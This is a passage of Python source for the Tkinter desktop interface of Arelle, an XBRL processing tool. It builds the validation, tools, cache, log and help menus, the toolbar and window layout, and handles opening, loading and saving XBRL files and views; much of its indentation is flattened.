validateMenu.add_checkbutton(label=_("Disclosure system checks"), underline=0, variable=self.validateDisclosureSystem, onvalue=True, offvalue=False)
validateMenu.add_command(label=_("Select disclosure system..."), underline=0, command=self.selectDisclosureSystem)
self.modelManager.validateCalcLB = self.config.setdefault("validateCalcLB",False)
self.validateCalcLB = BooleanVar(value=self.modelManager.validateCalcLB)
self.validateCalcLB.trace("w", self.setValidateCalcLB)
validateMenu.add_checkbutton(label=_("Calc Linkbase checks"), underline=0, variable=self.validateCalcLB, onvalue=True, offvalue=False)
self.modelManager.validateInferDecimals = self.config.setdefault("validateInferDecimals",True)
self.validateInferDecimals = BooleanVar(value=self.modelManager.validateInferDecimals)
self.validateInferDecimals.trace("w", self.setValidateInferDecimals)
validateMenu.add_checkbutton(label=_("Infer Decimals in calculations"), underline=0, variable=self.validateInferDecimals, onvalue=True, offvalue=False)
self.modelManager.validateDedupCalcs = self.config.setdefault("validateDedupCalcs",False)
self.validateDedupCalcs = BooleanVar(value=self.modelManager.validateDedupCalcs)
self.validateDedupCalcs.trace("w", self.setValidateDedupCalcs)
validateMenu.add_checkbutton(label=_("De-duplicate calculations"), underline=0, variable=self.validateDedupCalcs, onvalue=True, offvalue=False)
self.modelManager.validateUtr = self.config.setdefault("validateUtr",True)
self.validateUtr = BooleanVar(value=self.modelManager.validateUtr)
self.validateUtr.trace("w", self.setValidateUtr)
validateMenu.add_checkbutton(label=_("Unit Type Registry validation"), underline=0, variable=self.validateUtr, onvalue=True, offvalue=False)
for pluginMenuExtender in pluginClassMethods("CntlrWinMain.Menu.Validation"):
pluginMenuExtender(self, validateMenu)
formulaMenu = Menu(self.menubar, tearoff=0)
formulaMenu.add_command(label=_("Parameters..."), underline=0, command=self.formulaParametersDialog)
toolsMenu.add_cascade(label=_("Formula"), menu=formulaMenu, underline=0)
self.modelManager.formulaOptions = FormulaOptions(self.config.get("formulaParameters"))
toolsMenu.add_command(label=_("Compare DTSes..."), underline=0, command=self.compareDTSes)
cacheMenu = Menu(self.menubar, tearoff=0)
rssWatchMenu = Menu(self.menubar, tearoff=0)
rssWatchMenu.add_command(label=_("Options..."), underline=0, command=self.rssWatchOptionsDialog)
rssWatchMenu.add_command(label=_("Start"), underline=0, command=lambda: self.rssWatchControl(start=True))
rssWatchMenu.add_command(label=_("Stop"), underline=0, command=lambda: self.rssWatchControl(stop=True))
toolsMenu.add_cascade(label=_("RSS Watch"), menu=rssWatchMenu, underline=0)
self.modelManager.rssWatchOptions = self.config.setdefault("rssWatchOptions", {})
toolsMenu.add_cascade(label=_("Internet"), menu=cacheMenu, underline=0)
self.webCache.workOffline = self.config.setdefault("workOffline",False)
self.workOffline = BooleanVar(value=self.webCache.workOffline)
self.workOffline.trace("w", self.setWorkOffline)
cacheMenu.add_checkbutton(label=_("Work offline"), underline=0, variable=self.workOffline, onvalue=True, offvalue=False)
self.webCache.noCertificateCheck = self.config.setdefault("noCertificateCheck",False) # resets proxy handler stack if true
self.noCertificateCheck = BooleanVar(value=self.webCache.noCertificateCheck)
self.noCertificateCheck.trace("w", self.setNoCertificateCheck)
cacheMenu.add_checkbutton(label=_("No certificate check"), underline=0, variable=self.noCertificateCheck, onvalue=True, offvalue=False)
'''
self.webCache.recheck = self.config.setdefault("webRecheck",False)
self.webRecheck = BooleanVar(value=self.webCache.webRecheck)
self.webRecheck.trace("w", self.setWebRecheck)
cacheMenu.add_checkbutton(label=_("Recheck file dates weekly"), underline=0, variable=self.workOffline, onvalue=True, offvalue=False)
self.webCache.notify = self.config.setdefault("",False)
self.downloadNotify = BooleanVar(value=self.webCache.retrievalNotify)
self.downloadNotify.trace("w", self.setRetrievalNotify)
cacheMenu.add_checkbutton(label=_("Notify file downloads"), underline=0, variable=self.workOffline, onvalue=True, offvalue=False)
'''
cacheMenu.add_command(label=_("Clear cache"), underline=0, command=self.confirmClearWebCache)
cacheMenu.add_command(label=_("Manage cache"), underline=0, command=self.manageWebCache)
cacheMenu.add_command(label=_("Proxy Server"), underline=0, command=self.setupProxy)
logmsgMenu = Menu(self.menubar, tearoff=0)
toolsMenu.add_cascade(label=_("Messages log"), menu=logmsgMenu, underline=0)
logmsgMenu.add_command(label=_("Clear"), underline=0, command=self.logClear)
logmsgMenu.add_command(label=_("Save to file"), underline=0, command=self.logSaveToFile)
self.modelManager.collectProfileStats = self.config.setdefault("collectProfileStats",False)
self.collectProfileStats = BooleanVar(value=self.modelManager.collectProfileStats)
self.collectProfileStats.trace("w", self.setCollectProfileStats)
logmsgMenu.add_checkbutton(label=_("Collect profile stats"), underline=0, variable=self.collectProfileStats, onvalue=True, offvalue=False)
logmsgMenu.add_command(label=_("Log profile stats"), underline=0, command=self.showProfileStats)
logmsgMenu.add_command(label=_("Clear profile stats"), underline=0, command=self.clearProfileStats)
self.showDebugMessages = BooleanVar(value=self.config.setdefault("showDebugMessages",False))
self.showDebugMessages.trace("w", self.setShowDebugMessages)
logmsgMenu.add_checkbutton(label=_("Show debug messages"), underline=0, variable=self.showDebugMessages, onvalue=True, offvalue=False)
toolsMenu.add_command(label=_("Language..."), underline=0, command=lambda: DialogLanguage.askLanguage(self))
for pluginMenuExtender in pluginClassMethods("CntlrWinMain.Menu.Tools"):
pluginMenuExtender(self, toolsMenu)
self.menubar.add_cascade(label=_("Tools"), menu=toolsMenu, underline=0)
# view menu only if any plug-in additions provided
if any (pluginClassMethods("CntlrWinMain.Menu.View")):
viewMenu = Menu(self.menubar, tearoff=0)
for pluginMenuExtender in pluginClassMethods("CntlrWinMain.Menu.View"):
pluginMenuExtender(self, viewMenu)
self.menubar.add_cascade(label=_("View"), menu=viewMenu, underline=0)
helpMenu = Menu(self.menubar, tearoff=0)
for label, command, shortcut_text, shortcut in (
(_("Check for updates"), lambda: Updater.checkForUpdates(self), None, None),
(_("Manage plug-ins"), lambda: DialogPluginManager.dialogPluginManager(self), None, None),
(_("Manage packages"), lambda: DialogPackageManager.dialogPackageManager(self), None, None),
("PLUG-IN", "CntlrWinMain.Menu.Help.Upper", None, None),
(None, None, None, None),
(_("About..."), self.helpAbout, None, None),
("PLUG-IN", "CntlrWinMain.Menu.Help.Lower", None, None),
):
if label is None:
helpMenu.add_separator()
elif label == "PLUG-IN":
for pluginMenuExtender in pluginClassMethods(command):
pluginMenuExtender(self, helpMenu)
else:
helpMenu.add_command(label=label, underline=0, command=command, accelerator=shortcut_text)
                if shortcut:
                    self.parent.bind(shortcut, command)
for pluginMenuExtender in pluginClassMethods("CntlrWinMain.Menu.Help"):
            pluginMenuExtender(self, helpMenu)
self.menubar.add_cascade(label=_("Help"), menu=helpMenu, underline=0)
windowFrame = Frame(self.parent)
self.statusbar = Label(windowFrame, text=_("Ready..."), anchor=W)
self.statusbarTimerId = self.statusbar.after(5000, self.uiClearStatusTimerEvent)
self.statusbar.grid(row=2, column=0, columnspan=2, sticky=EW)
#self.balloon = tkinter.tix.Balloon(windowFrame, statusbar=self.statusbar)
self.toolbar_images = []
toolbar = Frame(windowFrame)
menubarColumn = 0
self.validateTooltipText = StringVar()
for image, command, toolTip, statusMsg in (
#("images/toolbarNewFile.gif", self.fileNew),
("toolbarOpenFile.gif", self.fileOpen, _("Open local file"), _("Open by choosing a local XBRL file, testcase, or archive file")),
("toolbarOpenWeb.gif", self.webOpen, _("Open web file"), _("Enter an http:// URL of an XBRL file or testcase")),
("toolbarReopen.gif", self.fileReopen, _("Reopen"), _("Reopen last opened XBRL file or testcase(s)")),
("toolbarSaveFile.gif", self.fileSaveExistingFile, _("Save file"), _("Saves currently selected local XBRL file")),
("toolbarClose.gif", self.fileClose, _("Close"), _("Closes currently selected instance/DTS or testcase(s)")),
(None,None,None,None),
("toolbarFindMenu.gif", self.find, _("Find"), _("Find dialog for scope and method of searching")),
(None,None,None,None),
("toolbarValidate.gif", self.validate, self.validateTooltipText, _("Validate currently selected DTS or testcase(s)")),
("toolbarCompare.gif", self.compareDTSes, _("Compare DTSes"), _("compare two DTSes")),
(None,None,None,None),
("toolbarLogClear.gif", self.logClear, _("Messages Log | Clear"), _("Clears the messages log")),
#(Combobox(toolbar, textvariable=self.findVar, values=self.findValues,
# ), self.logClear, _("Find options"), _("Select of find options")),
):
if command is None:
tbControl = Separator(toolbar, orient=VERTICAL)
tbControl.grid(row=0, column=menubarColumn, padx=6)
elif isinstance(image, Combobox):
tbControl = image
tbControl.grid(row=0, column=menubarColumn)
else:
image = os.path.join(self.imagesDir, image)
try:
image = PhotoImage(file=image)
self.toolbar_images.append(image)
tbControl = Button(toolbar, image=image, command=command, style="Toolbutton", padding=toolbarButtonPadding)
tbControl.grid(row=0, column=menubarColumn)
except TclError as err:
print(err)
if isinstance(toolTip,StringVar):
ToolTip(tbControl, textvariable=toolTip, wraplength=240)
else:
ToolTip(tbControl, text=toolTip)
menubarColumn += 1
for toolbarExtender in pluginClassMethods("CntlrWinMain.Toolbar"):
toolbarExtender(self, toolbar)
toolbar.grid(row=0, column=0, sticky=(N, W))
paneWinTopBtm = PanedWindow(windowFrame, orient=VERTICAL)
paneWinTopBtm.grid(row=1, column=0, sticky=(N, S, E, W))
paneWinLeftRt = tkinter.PanedWindow(paneWinTopBtm, orient=HORIZONTAL)
paneWinLeftRt.grid(row=0, column=0, sticky=(N, S, E, W))
paneWinLeftRt.bind("<<NotebookTabChanged>>", self.onTabChanged)
paneWinTopBtm.add(paneWinLeftRt)
self.tabWinTopLeft = Notebook(paneWinLeftRt, width=250, height=300)
self.tabWinTopLeft.grid(row=0, column=0, sticky=(N, S, E, W))
paneWinLeftRt.add(self.tabWinTopLeft)
self.tabWinTopRt = Notebook(paneWinLeftRt)
self.tabWinTopRt.grid(row=0, column=0, sticky=(N, S, E, W))
self.tabWinTopRt.bind("<<NotebookTabChanged>>", self.onTabChanged)
paneWinLeftRt.add(self.tabWinTopRt)
self.tabWinBtm = Notebook(paneWinTopBtm)
self.tabWinBtm.grid(row=0, column=0, sticky=(N, S, E, W))
self.tabWinBtm.bind("<<NotebookTabChanged>>", self.onTabChanged)
paneWinTopBtm.add(self.tabWinBtm)
from arelle import ViewWinList
self.logView = ViewWinList.ViewList(None, self.tabWinBtm, _("messages"), True)
self.startLogging(logHandler=WinMainLogHandler(self)) # start logger
logViewMenu = self.logView.contextMenu(contextMenuClick=self.contextMenuClick)
logViewMenu.add_command(label=_("Clear"), underline=0, command=self.logClear)
logViewMenu.add_command(label=_("Save to file"), underline=0, command=self.logSaveToFile)
if self.hasClipboard:
logViewMenu.add_command(label=_("Copy to clipboard"), underline=0, command=lambda: self.logView.copyToClipboard(cntlr=self))
windowFrame.grid(row=0, column=0, sticky=(N,S,E,W))
windowFrame.columnconfigure(0, weight=999)
windowFrame.columnconfigure(1, weight=1)
windowFrame.rowconfigure(0, weight=1)
windowFrame.rowconfigure(1, weight=999)
windowFrame.rowconfigure(2, weight=1)
paneWinTopBtm.columnconfigure(0, weight=1)
paneWinTopBtm.rowconfigure(0, weight=1)
paneWinLeftRt.columnconfigure(0, weight=1)
paneWinLeftRt.rowconfigure(0, weight=1)
self.tabWinTopLeft.columnconfigure(0, weight=1)
self.tabWinTopLeft.rowconfigure(0, weight=1)
self.tabWinTopRt.columnconfigure(0, weight=1)
self.tabWinTopRt.rowconfigure(0, weight=1)
self.tabWinBtm.columnconfigure(0, weight=1)
self.tabWinBtm.rowconfigure(0, weight=1)
window = self.parent.winfo_toplevel()
window.columnconfigure(0, weight=1)
window.rowconfigure(0, weight=1)
priorState = self.config.get('windowState')
screenW = self.parent.winfo_screenwidth() - 16 # allow for window edge
screenH = self.parent.winfo_screenheight() - 64 # allow for caption and menus
if priorState == "zoomed":
self.parent.state("zoomed")
w = screenW
h = screenH
        else:
            w = screenW # fall back to screen dimensions if prior geometry is absent or unparseable
            h = screenH
            priorGeometry = re.match(r"(\d+)x(\d+)[+]?([-]?\d+)[+]?([-]?\d+)", self.config.get('windowGeometry', ''))
if priorGeometry and priorGeometry.lastindex >= 4:
try:
w = int(priorGeometry.group(1))
h = int(priorGeometry.group(2))
x = int(priorGeometry.group(3))
y = int(priorGeometry.group(4))
if x + w > screenW:
if w < screenW:
x = screenW - w
else:
x = 0
w = screenW
elif x < 0:
x = 0
if w > screenW:
w = screenW
if y + h > screenH:
if y < screenH:
y = screenH - h
else:
y = 0
h = screenH
elif y < 0:
y = 0
if h > screenH:
h = screenH
self.parent.geometry("{0}x{1}+{2}+{3}".format(w,h,x,y))
except:
pass
# set top/btm divider
topLeftW, topLeftH = self.config.get('tabWinTopLeftSize',(250,300))
if 10 < topLeftW < w - 60:
self.tabWinTopLeft.config(width=topLeftW)
if 10 < topLeftH < h - 60:
self.tabWinTopLeft.config(height=topLeftH)
self.parent.title(_("arelle - Unnamed"))
self.logFile = None
self.uiThreadQueue = queue.Queue() # background processes communicate with ui thread
self.uiThreadChecker(self.statusbar) # start background queue
self.modelManager.loadCustomTransforms() # load if custom transforms not loaded
if not self.modelManager.disclosureSystem.select(self.config.setdefault("disclosureSystem", None)):
self.validateDisclosureSystem.set(False)
self.modelManager.validateDisclosureSystem = False
# load argv overrides for modelManager options
lastArg = None
for arg in sys.argv:
if not arg: continue
if lastArg == "--skipLoading": # skip loading matching files (list of unix patterns)
self.modelManager.skipLoading = re.compile('|'.join(fnmatch.translate(f) for f in arg.split('|')))
elif arg == "--skipDTS": # skip DTS loading, discovery, etc
self.modelManager.skipDTS = True
lastArg = arg
self.setValidateTooltipText()
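    # notebook tab changed: remember the newly selected tab's view as the current view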
def onTabChanged(self, event, *args):
try:
widgetIndex = event.widget.index("current")
tabId = event.widget.tabs()[widgetIndex]
for widget in event.widget.winfo_children():
if str(widget) == tabId:
self.currentView = widget.view
break
except (AttributeError, TypeError, TclError):
pass
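    # (re)build the Recent files, Recent imports, and Packages cascades at the end of the File menu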
def loadFileMenuHistory(self):
self.fileMenu.delete(self.fileMenuLength, self.fileMenuLength + 2)
fileHistory = self.config.setdefault("fileHistory", [])
self.recentFilesMenu = Menu(self.menubar, tearoff=0)
for i in range( min( len(fileHistory), 10 ) ):
self.recentFilesMenu.add_command(
label=fileHistory[i],
command=lambda j=i: self.fileOpenFile(self.config["fileHistory"][j]))
self.fileMenu.add_cascade(label=_("Recent files"), menu=self.recentFilesMenu, underline=0)
importHistory = self.config.setdefault("importHistory", [])
self.recentAttachMenu = Menu(self.menubar, tearoff=0)
for i in range( min( len(importHistory), 10 ) ):
self.recentAttachMenu.add_command(
label=importHistory[i],
command=lambda j=i: self.fileOpenFile(self.config["importHistory"][j],importToDTS=True))
self.fileMenu.add_cascade(label=_("Recent imports"), menu=self.recentAttachMenu, underline=0)
self.packagesMenu = Menu(self.menubar, tearoff=0)
hasPackages = False
for i, packageInfo in enumerate(sorted(PackageManager.packagesConfig.get("packages", []),
key=lambda packageInfo: packageInfo.get("name")),
start=1):
name = packageInfo.get("name", "package{}".format(i))
URL = packageInfo.get("URL")
if name and URL and packageInfo.get("status") == "enabled":
self.packagesMenu.add_command(
label=name,
command=lambda url=URL: self.fileOpenFile(url))
hasPackages = True
if hasPackages:
self.fileMenu.add_cascade(label=_("Packages"), menu=self.packagesMenu, underline=0)
def onPackageEnablementChanged(self):
self.loadFileMenuHistory()
def fileNew(self, *ignore):
if not self.okayToContinue():
return
self.logClear()
self.dirty = False
self.filename = None
self.data = {}
self.parent.title(_("arelle - Unnamed"));
self.modelManager.load(None);
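    # return the current view and its modelXbrl, if any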
def getViewAndModelXbrl(self):
view = getattr(self, "currentView", None)
if view:
modelXbrl = None
try:
modelXbrl = view.modelXbrl
return (view, modelXbrl)
except AttributeError:
return (view, None)
return (None, None)
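    # prompt before discarding unsaved changes; returns True if it is safe to proceed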
def okayToContinue(self):
view, modelXbrl = self.getViewAndModelXbrl()
documentIsModified = False
if view is not None:
try:
# What follows only exists in ViewWinRenderedGrid
view.updateInstanceFromFactPrototypes()
except AttributeError:
pass
if modelXbrl is not None:
documentIsModified = modelXbrl.isModified()
if not self.dirty and (not documentIsModified):
return True
reply = tkinter.messagebox.askokcancel(
_("arelle - Unsaved Changes"),
_("Are you sure to close the current instance without saving?\n (OK will discard changes.)"),
parent=self.parent)
if reply is None:
return False
else:
return reply
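    # save the current view's content; the dialog and output format depend on the view class and fileType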
def fileSave(self, event=None, view=None, fileType=None, filenameFromInstance=False, *ignore):
if view is None:
view = getattr(self, "currentView", None)
if view is not None:
filename = None
modelXbrl = None
try:
modelXbrl = view.modelXbrl
except AttributeError:
pass
if filenameFromInstance:
try:
modelXbrl = view.modelXbrl
filename = modelXbrl.modelDocument.filepath
if filename.endswith('.xsd'): # DTS entry point, no instance saved yet!
filename = None
except AttributeError:
pass
if isinstance(view, ViewWinRenderedGrid.ViewRenderedGrid):
initialdir = os.path.dirname(modelXbrl.modelDocument.uri)
if fileType in ("html", "xml", None):
if fileType == "html" and filename is None:
filename = self.uiFileDialog("save",
title=_("arelle - Save HTML-rendered Table"),
initialdir=initialdir,
filetypes=[(_("HTML file .html"), "*.html"), (_("HTML file .htm"), "*.htm")],
defaultextension=".html")
elif fileType == "xml" and filename is None:
filename = self.uiFileDialog("save",
title=_("arelle - Save Table Layout Model"),
initialdir=initialdir,
filetypes=[(_("Layout model file .xml"), "*.xml")],
defaultextension=".xml")
else: # ask file type
if filename is None:
filename = self.uiFileDialog("save",
title=_("arelle - Save XBRL Instance or HTML-rendered Table"),
initialdir=initialdir,
filetypes=[(_("XBRL instance .xbrl"), "*.xbrl"), (_("XBRL instance .xml"), "*.xml"), (_("HTML table .html"), "*.html"), (_("HTML table .htm"), "*.htm")],
defaultextension=".html")
if filename and (filename.endswith(".xbrl") or filename.endswith(".xml")):
view.saveInstance(filename)
return True
if not filename:
return False
try:
ViewFileRenderedGrid.viewRenderedGrid(modelXbrl, filename, lang=self.labelLang, sourceView=view)
except (IOError, EnvironmentError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
filename, err),
parent=self.parent)
return True
elif fileType == "xbrl":
return self.uiFileDialog("save",
title=_("arelle - Save Instance"),
initialdir=initialdir,
filetypes=[(_("XBRL instance .xbrl"), "*.xbrl"), (_("XBRL instance .xml"), "*.xml")],
defaultextension=".xbrl")
elif isinstance(view, ViewWinTests.ViewTests) and modelXbrl.modelDocument.type in (ModelDocument.Type.TESTCASESINDEX, ModelDocument.Type.TESTCASE):
filename = self.uiFileDialog("save",
title=_("arelle - Save Test Results"),
initialdir=os.path.dirname(self.modelManager.modelXbrl.modelDocument.uri),
filetypes=[(_("CSV file"), "*.csv")],
defaultextension=".csv")
if not filename:
return False
try:
ViewFileTests.viewTests(self.modelManager.modelXbrl, filename)
except (IOError, EnvironmentError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
filename, err),
parent=self.parent)
return True
elif isinstance(view, ViewWinTree.ViewTree):
filename = self.uiFileDialog("save",
title=_("arelle - Save {0}").format(view.tabTitle),
initialdir=os.path.dirname(self.modelManager.modelXbrl.modelDocument.uri),
filetypes=[(_("XLSX file"), "*.xlsx"),(_("CSV file"), "*.csv"),(_("HTML file"), "*.html"),(_("XML file"), "*.xml"),(_("JSON file"), "*.json")],
defaultextension=".xlsx")
if not filename:
return False
try:
if isinstance(view, ViewWinRoleTypes.ViewRoleTypes):
ViewFileRoleTypes.viewRoleTypes(modelXbrl, filename, view.tabTitle, view.isArcrole, lang=view.lang)
elif isinstance(view, ViewWinConcepts.ViewConcepts):
ViewFileConcepts.viewConcepts(modelXbrl, filename, labelrole=view.labelrole, lang=view.lang)
elif isinstance(view, ViewWinFactList.ViewFactList):
ViewFileFactList.viewFacts(modelXbrl, filename, labelrole=view.labelrole, lang=view.lang)
else:
ViewFileRelationshipSet.viewRelationshipSet(modelXbrl, filename, view.tabTitle, view.arcrole, labelrole=view.labelrole, lang=view.lang)
except (IOError, EnvironmentError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
filename, err),
parent=self.parent)
return True
elif isinstance(view, ViewWinXml.ViewXml) and self.modelManager.modelXbrl.formulaOutputInstance:
filename = self.uiFileDialog("save",
title=_("arelle - Save Formula Result Instance Document"),
initialdir=os.path.dirname(self.modelManager.modelXbrl.modelDocument.uri),
filetypes=[(_("XBRL output instance .xml"), "*.xml"), (_("XBRL output instance .xbrl"), "*.xbrl")],
defaultextension=".xml")
if not filename:
return False
try:
from arelle import XmlUtil
with open(filename, "w") as fh:
XmlUtil.writexml(fh, self.modelManager.modelXbrl.formulaOutputInstance.modelDocument.xmlDocument, encoding="utf-8")
self.addToLog(_("[info] Saved formula output instance to {0}").format(filename) )
except (IOError, EnvironmentError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
self.filename, err),
parent=self.parent)
return True
tkinter.messagebox.showwarning(_("arelle - Save what?"),
_("Nothing has been selected that can be saved. \nPlease select a view pane that can be saved."),
parent=self.parent)
'''
if self.filename is None:
filename = self.uiFileDialog("save",
title=_("arelle - Save File"),
initialdir=".",
filetypes=[(_("Xbrl file"), "*.x*")],
defaultextension=".xbrl")
if not filename:
return False
self.filename = filename
if not self.filename.endswith(".xbrl"):
self.filename += ".xbrl"
try:
with open(self.filename, "wb") as fh:
pickle.dump(self.data, fh, pickle.HIGHEST_PROTOCOL)
self.dirty = False
self.uiShowStatus(_("Saved {0} items to {1}").format(
len(self.data),
self.filename), clearAfter=5000)
self.parent.title(_("arelle - {0}").format(
os.path.basename(self.filename)))
except (EnvironmentError, pickle.PickleError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
self.filename, err),
parent=self.parent)
return True;
'''
def fileSaveExistingFile(self, event=None, view=None, fileType=None, *ignore):
return self.fileSave(view=view, fileType=fileType, filenameFromInstance=True)
def saveDTSpackage(self):
self.modelManager.saveDTSpackage(allDTSes=True)
def fileOpen(self, *ignore):
if not self.okayToContinue():
return
filename = self.uiFileDialog("open",
title=_("arelle - Open file"),
initialdir=self.config.setdefault("fileOpenDir","."),
filetypes=[(_("XBRL files"), "*.*")],
defaultextension=".xbrl")
if self.isMSW and "/Microsoft/Windows/Temporary Internet Files/Content.IE5/" in filename:
tkinter.messagebox.showerror(_("Loading web-accessed files"),
_('Please open web-accessed files with the second toolbar button, "Open web file", or the File menu, second entry, "Open web..."'), parent=self.parent)
return
if os.sep == "\\":
filename = filename.replace("/", "\\")
self.fileOpenFile(filename)
def importFileOpen(self, *ignore):
if not self.modelManager.modelXbrl or self.modelManager.modelXbrl.modelDocument.type not in (
ModelDocument.Type.SCHEMA, ModelDocument.Type.LINKBASE, ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL):
tkinter.messagebox.showwarning(_("arelle - Warning"),
_("Import requires an opened DTS"), parent=self.parent)
return False
filename = self.uiFileDialog("open",
title=_("arelle - Import file into opened DTS"),
initialdir=self.config.setdefault("importOpenDir","."),
filetypes=[(_("XBRL files"), "*.*")],
defaultextension=".xml")
if self.isMSW and "/Microsoft/Windows/Temporary Internet Files/Content.IE5/" in filename:
tkinter.messagebox.showerror(_("Loading web-accessed files"),
_('Please import web-accessed files with the File menu, fourth entry, "Import web..."'), parent=self.parent)
return
if os.sep == "\\":
filename = filename.replace("/", "\\")
self.fileOpenFile(filename, importToDTS=True)
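    # move url to the top of the file or import history (10 entries maximum) and rebuild the menu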
def updateFileHistory(self, url, importToDTS):
key = "importHistory" if importToDTS else "fileHistory"
fileHistory = self.config.setdefault(key, [])
while fileHistory.count(url) > 0:
fileHistory.remove(url)
if len(fileHistory) > 10:
fileHistory[10:] = []
fileHistory.insert(0, url)
self.config[key] = fileHistory
self.loadFileMenuHistory()
self.saveConfig()
def fileOpenFile(self, filename, importToDTS=False, selectTopView=False):
if filename:
for xbrlLoadedMethod in pluginClassMethods("CntlrWinMain.Xbrl.Open"):
filename = xbrlLoadedMethod(self, filename) # runs in GUI thread, allows mapping filename, mult return filename
filesource = None
# check for archive files
filesource = openFileSource(filename, self,
checkIfXmlIsEis=self.modelManager.disclosureSystem and
self.modelManager.disclosureSystem.validationType == "EFM")
if filesource.isArchive and not filesource.selection: # or filesource.isRss:
from arelle import DialogOpenArchive
filename = DialogOpenArchive.askArchiveFile(self, filesource)
if filename:
if not isinstance(filename, (dict, list)): # json objects
if importToDTS:
if not isHttpUrl(filename):
self.config["importOpenDir"] = os.path.dirname(filename)
else:
if not isHttpUrl(filename):
self.config["fileOpenDir"] = os.path.dirname(filesource.baseurl if filesource.isArchive else filename)
self.updateFileHistory(filename, importToDTS)
                threading.Thread(target=self.backgroundLoadXbrl, args=(filesource,importToDTS,selectTopView), daemon=True).start()
def webOpen(self, *ignore):
if not self.okayToContinue():
return
url = DialogURL.askURL(self.parent, buttonSEC=True, buttonRSS=True)
if url:
self.updateFileHistory(url, False)
for xbrlLoadedMethod in pluginClassMethods("CntlrWinMain.Xbrl.Open"):
url = xbrlLoadedMethod(self, url) # runs in GUI thread, allows mapping url, mult return url
filesource = openFileSource(url,self)
if filesource.isArchive and not filesource.selection: # or filesource.isRss:
from arelle import DialogOpenArchive
url = DialogOpenArchive.askArchiveFile(self, filesource)
self.updateFileHistory(url, False)
            threading.Thread(target=self.backgroundLoadXbrl, args=(filesource,False,False), daemon=True).start()
def importWebOpen(self, *ignore):
if not self.modelManager.modelXbrl or self.modelManager.modelXbrl.modelDocument.type not in (
ModelDocument.Type.SCHEMA, ModelDocument.Type.LINKBASE, ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL):
tkinter.messagebox.showwarning(_("arelle - Warning"),
_("Import requires an opened DTS"), parent=self.parent)
return False
url = DialogURL.askURL(self.parent, buttonSEC=False, buttonRSS=False)
if url:
self.fileOpenFile(url, importToDTS=True)
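    # background thread: load or import the filesource, then hand view creation to the UI thread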
def backgroundLoadXbrl(self, filesource, importToDTS, selectTopView):
startedAt = time.time()
try:
if importToDTS:
action = _("imported")
profileStat = "import"
modelXbrl = self.modelManager.modelXbrl
if modelXbrl:
ModelDocument.load(modelXbrl, filesource.url, isSupplemental=importToDTS)
modelXbrl.relationshipSets.clear() # relationships have to be re-cached
else:
action = _("loaded")
profileStat = "load"
modelXbrl = self.modelManager.load(filesource, _("views loading"),
checkModifiedTime=isHttpUrl(filesource.url)) # check modified time if GUI-loading from web
except ModelDocument.LoadingException:
self.showStatus(_("Loading terminated, unrecoverable error"), 20000)
return
except Exception as err:
msg = _("Exception loading {0}: {1}, at {2}").format(
filesource.url,
err,
traceback.format_tb(sys.exc_info()[2]))
# not sure if message box can be shown from background thread
# tkinter.messagebox.showwarning(_("Exception loading"),msg, parent=self.parent)
            self.addToLog(msg)
self.showStatus(_("Loading terminated, unrecoverable error"), 20000)
return
if modelXbrl and modelXbrl.modelDocument:
statTime = time.time() - startedAt
modelXbrl.profileStat(profileStat, statTime)
self.addToLog(format_string(self.modelManager.locale,
_("%s in %.2f secs"),
(action, statTime)))
if modelXbrl.hasTableRendering:
self.showStatus(_("Initializing table rendering"))
RenderingEvaluator.init(modelXbrl)
self.showStatus(_("{0}, preparing views").format(action))
self.waitForUiThreadQueue() # force status update
self.uiThreadQueue.put((self.showLoadedXbrl, [modelXbrl, importToDTS, selectTopView]))
else:
self.addToLog(format_string(self.modelManager.locale,
_("not successfully %s in %.2f secs"),
(action, time.time() - startedAt)))
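    # ui thread: build the view panes appropriate to the loaded document's type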
def showLoadedXbrl(self, modelXbrl, attach, selectTopView=False):
startedAt = time.time()
currentAction = "setting title"
topView = None
self.currentView = None
try:
if attach:
modelXbrl.closeViews()
self.parent.title(_("arelle - {0}").format(
os.path.basename(modelXbrl.modelDocument.uri)))
self.setValidateTooltipText()
if modelXbrl.modelDocument.type in ModelDocument.Type.TESTCASETYPES:
currentAction = "tree view of tests"
ViewWinTests.viewTests(modelXbrl, self.tabWinTopRt)
topView = modelXbrl.views[-1]
elif modelXbrl.modelDocument.type == ModelDocument.Type.VERSIONINGREPORT:
currentAction = "view of versioning report"
ViewWinVersReport.viewVersReport(modelXbrl, self.tabWinTopRt)
from arelle.ViewWinDiffs import ViewWinDiffs
ViewWinDiffs(modelXbrl, self.tabWinBtm, lang=self.labelLang)
elif modelXbrl.modelDocument.type == ModelDocument.Type.RSSFEED:
currentAction = "view of RSS feed"
ViewWinRssFeed.viewRssFeed(modelXbrl, self.tabWinTopRt)
topView = modelXbrl.views[-1]
else:
if modelXbrl.hasTableIndexing:
currentAction = "table index view"
ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopLeft, ("Tables", (XbrlConst.euGroupTable,)), lang=self.labelLang,
treeColHdr="Table Index", showLinkroles=False, showColumns=False, expandAll=True)
elif modelXbrl.modelDocument.type in (ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL, ModelDocument.Type.INLINEXBRLDOCUMENTSET):
currentAction = "table index view"
firstTableLinkroleURI, indexLinkroleURI = TableStructure.evaluateTableIndex(modelXbrl, lang=self.labelLang)
if firstTableLinkroleURI is not None:
ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopLeft, ("Tables", (XbrlConst.parentChild,)), lang=self.labelLang, linkrole=indexLinkroleURI,
treeColHdr="Table Index", showRelationships=False, showColumns=False, expandAll=False, hasTableIndex=True)
'''
elif (modelXbrl.modelDocument.type in (ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL, ModelDocument.Type.INLINEXBRLDOCUMENTSET) and
not modelXbrl.hasTableRendering):
currentAction = "facttable ELRs view"
ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopLeft, ("Tables", (XbrlConst.parentChild,)), lang=self.labelLang,
treeColHdr="Fact Table Index", showLinkroles=True, showColumns=False, showRelationships=False, expandAll=False)
'''
